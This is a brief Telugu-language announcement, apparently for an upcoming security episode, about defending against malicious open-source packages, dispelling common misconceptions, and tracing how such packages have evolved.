తదుపరి ఎపిసోడ్లో “ఓపెన్ సోర్స్ హానికరమైన ప్యాకేజీల నుండి రక్షణ: ఏది (పనిచేయదు)" ఓపెన్-సోర్స్ భద్రతకు సంబంధించి చేయవలసినవి మరియు చేయకూడని వాటి గురించి మనం చర్చిస్తాము. భద్రతపై అవగాహన ఉన్న చాలా మంది నిపుణులకు ఈ ముప్పును ఎలా ఎదుర్కోవాలో అనే దానిపై అవగాహన ఉంటుంది, కానీ అపోహలు మాత్రం విపరీతంగా ఉన్నాయి.
ఈ ఆలోచనలు ఎందుకు తప్పు అని, మరియు అటువంటి అపోహలు ఈ దాడి విధానం యొక్క ప్రాచుర్యానికి, అలాగే సంస్థలు ఎదుర్కొంటున్న అపారమైన ప్రమాదానికి ఎలా దోహదపడుతున్నాయో మనం సమీక్షిస్తాము. ఆ తర్వాత, ఏది పనిచేస్తుందో, మరియు దానికి అవసరమైన కృషి మరియు వనరులు ఏమిటో చర్చిస్తాము.
అలాగే, హానికరమైన ప్యాకేజీల ఉద్దేశ్యం, వాటిని చొప్పించే విధానం మరియు దాడి చేసే పద్ధతుల పరంగా వాటి పరిణామం గురించి కూడా మేము పోస్ట్ చేయబోతున్నాము.
చూస్తూ ఉండండి!






